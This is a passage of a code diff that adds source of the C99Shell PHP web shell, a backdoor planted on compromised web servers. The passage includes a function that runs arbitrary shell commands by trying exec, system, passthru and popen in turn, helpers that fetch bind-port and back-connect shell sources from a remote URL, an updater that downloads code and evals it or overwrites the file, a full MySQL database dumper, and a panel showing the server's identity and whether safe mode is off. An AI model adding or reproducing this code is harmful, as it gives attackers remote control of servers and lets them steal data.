+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by C99Shell.SQL v. ".$shver." 
+# Home page: http://ccteam.ru 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
